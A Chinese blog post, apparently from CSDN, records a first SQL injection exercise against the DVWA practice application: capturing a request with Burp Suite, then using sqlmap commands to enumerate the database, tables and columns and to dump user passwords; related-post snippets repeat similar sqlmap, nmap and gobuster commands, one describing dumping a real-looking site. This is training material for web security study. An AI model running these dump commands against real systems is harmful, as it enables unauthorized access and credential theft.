2018-11-08 第一次DVWA靶机爆破SQL注入漏洞记录(GET方法,使用SQLMAP、任意抓包工具)...

最新推荐文章于 2024-05-09 09:11:23 发布
最新推荐文章于 2024-05-09 09:11:23 发布
阅读量251 收藏 2
点赞数
分类专栏: web安全渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42254735/article/details/101478082
版权

首先进入DVWA,调整安全级别为low。​

 
12321111-d66349f5587c7575
 

打开SQL Injection页面,ID栏输入1​

 
12321111-8c8dceb93a2665ea
 

因为DVWA需要登录,所以使用Burp Suite抓包,包里包含了cookie。

 
12321111-a84bda6f3fd213ca
 

将抓包内容保存至本地(/root/test)​

 
12321111-c787873e832981f3
 

打开终端,输入: sqlmap -r /root/test --current-db   ,根据包里的内容猜解当前数据库,可以不加--current-db以爆破所有库。

 
12321111-492b2e845b642b5b
 

得到当前使用库名'dvwa',输入:sqlmap -r /root/test -D dvwa --tables   ,爆破dvwa库中的表名。

 
12321111-ce18d9684890b599
 

查看表名,比较感兴趣的是users表,所以输入:sqlmap -r /root/test -D dvwa -T users --columns   ,爆破users表中的列。

 
12321111-ed681113dbeb4430
 

出现user和password字段,输入:sqlmap -r /root/test -D dvwa -T users -C user,password --dump   ,查看并顺手md5猜解一下。

 
12321111-3dde72fc426d419c
 
昨天今天下雨天233
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
,nmap和sqlmap
Zsl1183323的博客
03-22 4420
方式: 1.进入kali,打开terminal emulator,输入burpsuite,回车 2.在弹出的jre对话框中勾选此jre不再显示,再点击OK,在对话框点击I Accept,在新对话框点击下一步 3.点击 浏览器,搜索172.0.0.1:8080,下载证书,再打开设置,选择settings,拉倒最底层单击settings,选择第四个单选框,在http proxy中输入172.0.0.1,在在porp中输入8080,单击OK 4.选择Privacy&Security,拉到最下方,双击V
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
1. sqlmap是一款强大的自动化SQL注入工具,它可以自动识别SQL注入漏洞并利用它们。在本实验中,我们将用sqlmapDVWA(Damn Vulnerable Web Application)靶场进行测试。 2. 首先,我们需要获取靶机上的数据库信息...
2018-10 第一次DVWA靶机爆破SQL注入漏洞记录GET方法使用SQLMAP任意工具
昨天今天下雨天的博客
10-29 2352
首先进入DVWA,调整安全级别为low。 打开SQL Injection页面,ID栏输入1 因为DVWA需要登录,所以使用Burp Suite含了cookie。 将内容保存至本地(/root/test) 打开终端,输入: sqlmap -r /root/test --current-db   ,根据里的内容猜解当前数据库,可以不加--current-db以...
10 个 SQL 注入工具(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
leah126的博客
05-09 1857
其主要的目标是在存在着漏洞的数据库服务器上提供一个远程的外壳,甚至在一个有着严格的防范措施的环境中也能如此。Havij不仅能够自动挖掘可利用的SQL 查询,还能够识别后台数据库类型、检索数据的用户名和密码hash、转储表和列、从数据库中提取数据,甚至访问底层文件系统和执行系统命令,当然前提是有 一个可利用的SQL注入漏洞。内容概要:括 内网、操作系统、协议、渗透测试、安服、漏洞注入、XSS、CSRF、SSRF、文件上传、文件下载、文件含、XXE、逻辑漏洞工具SQLmap、NMAP、BP、MSF…
BurosuiteSqlmap学习Sql注入
aiquan9342的博客
01-09 238
sqlmap中加入--proyxy参数: --proxy "http://127.0.0.1:8080" 如下图所示: 回车以后sqlmap会自动到数据: 我们选择向前(forward)即可: 可以看到参数ID的后面多了一些URL的编码。可以复制然后去解开看看。 简单学习。嘻嘻。每天进步一点点。 THE END ...
ica1靶机(hydra爆破
m0_66299232的博客
12-04 409
靶机链接:百度网盘 请输入提取码提取码:4kn2虚拟机网络链接模式:桥接模式攻击机系统:kali linux 2022.031.探测目标靶机ip2.用nmap探测靶机开放端口和服务nmap -p- -A -sV -T4 192.168.1.1073.用gobuster扫描网站目录gobuster dir -u http://192.168.1.107 -w /usr/share/wordlists/dirb/big.txt -t 100 -x php,txt,html,js,php.bak,txt.bak,
sqlmap的数据
qq_45300786的博客
07-17 1349
我们接着上一篇的链接 点我 我们写burp的代理 –proxy=“http://127.0.0.1:8080” 然后把burp打开,开始跑sqlmap了 然后放一个,跑一个sqlmap
2020-12-06-DVWAsql.md
01-24
dvwasql
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
1. SQLMapSQLMap 是一个开源的 SQL 注入检测工具,可以自动检测 SQL 注入漏洞。 2. Burp Suite:Burp Suite 是一个 Web 应用安全检测工具SQL 注入检测功能。 六、总结 SQL 注入是一种常见的 Web 应用安全...
DVWA-master.zip
11-16
DVWA-master.zip
e-1-6-通过sqlnamp检测sql注入漏洞-随堂笔记 .doc
10-23
SQL注入漏洞SQLmap工具SQL注入是一种常见的网络安全漏洞,攻击者通过在Web表单中插入恶意SQL语句,欺骗服务器执行非预期的数据库操作。这种漏洞可能导致数据泄露、非法权限获取,甚至整个数据库系统的瘫痪。...
在kali上使用sqlmap进行爆破
learninger12的博客
02-13 6219
sqlmap进行爆破 接下来看一下sqlmap的版本: 我们进行爆破的时候,一定要找有注入点的,比如这样的: 再来一个没有注入的,来做一下对比: 这里我们就可以看的出来,在地址栏中,我们会发现,有注入的,在网址的最后面会有一些不同的东西,没有注入的就没有东西,我们要找的就是有注入的东西,这样我们才能对网站进行爆破,下面进行爆破,获取网站的一些基本信息: 看上图的下方区域,我们可以清楚的看到一些基础信息,这里就不过多的解释了。 接下来是查...
dvwa爆数据库andsqlmap爆数据库
2301_77315080的博客
08-28 417
正常提交payload为1。
简明SQLmap暴库
热门推荐
回忆式~过去.的博客
04-01 1万+
1、首先在网站找到 可能有sql注入的 url链接,图中凭感觉怀疑 id 参数有注入的可能 2、上sql map,检测这个url 3、稍等片刻后 扫描结果如图中,说明有注入,不做过多详细说明 4、既然有注入,直接 --dbs 爆破出 数据库名称 5、稍等片刻,sqlmap 告诉我们 找到三个数据库 6、maoshe 这个数据库应该是 该网站的数据库,直接 指定数据库 爆库 -D “maoshe” --dump-all 7、数据库中的表数据都被保存下来了 拿到admin 账号密码 就可以
mysql注入 爆库_DVWA下的盲注<SQLmap工具注入>
weixin_32557787的博客
02-02 257
LOW难度!!!所需工具DVWA环境、工具sqlmap工具用fiddler为例。=====================================先进入DVWA调整模式为LOW 打开工具,确定可以到http流量 DVWA下选择SQL盲注,随意输入一个USER ID后回车会看到回显,用户ID存在复制该网页链接,保存到记事本,等下sqlmap用 用工具获取本次提交的网...
sqlmap 没发现sql注入语句
CPriLuke的博客
05-01 456
原因: sqlmap中的.sqlmap目录下保存了上次信息, sqlmap再次探测直接使用了上次信息 解决办法: rm 删除上次信息
sqlmap入门-爆库,爆表,列,字段
weixin_46626737的博客
11-14 6920
①当判断a为get注入点后(get) 可使用python sqlmap.py -u "url?a=1" --dbs爆数据库 假设结果中有member数据库 ②爆表 python sqlmap.py -u "url?a=1" --tables -D member 假设有表student ③爆列 python sqlmap.py -u "url?a=1" --column -T student -D member 假设有列id,password,stasus等列 ④爆字段 python sq
命令注入DVWA命令注入实例
Zeker62的博客
08-17 474
什么是命令注入? 在开发者开发程序过程中,一些高级应用可能需要调用一些外部程序:比如命令行获取信息、exe可执行文件等等。调用的时候会用到一些系统命令函数,通过这些函数,可以在其中注入一些恶意代码 命令注入漏洞产生原因 用户输入作为拼接 没有足够的安全过滤 危害 继承web服务器程序执行系统命令 继承web服务器权限,读写文件 反弹shell,即服务器主动联系攻击方 控制网站 控制服务器 相关函数(PHP) system() / passthru()函数:可以将字符串参数直接作为系统命令来执行:
Sql注入爆破--DVWA
HurryPotter
04-04 1238
Sql注入爆破工具Sqlmap、BurpSuit 方法:利用BurpSuit获取登录cookie进行爆破 DVWA级别:low 1)原理: 2)实战: BurpSuitSQL Injection 输入栏输入:1 保存数据 将信息保存到本地文件test: Sqlmap暴力破解 开启Sqlmap,输入:sqlmap -r /root/De...
dvwa靶机sql注入
08-04
DVWA靶机中的SQL注入是一种安全漏洞,攻击者可以通过构造恶意的SQL语句来绕过应用程序的验证和过滤机制,从而获取未授权的访问权限或者获取敏感信息。根据引用[1]和引用[2]中提到的内容,DVWA靶机中的SQL注入分为...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值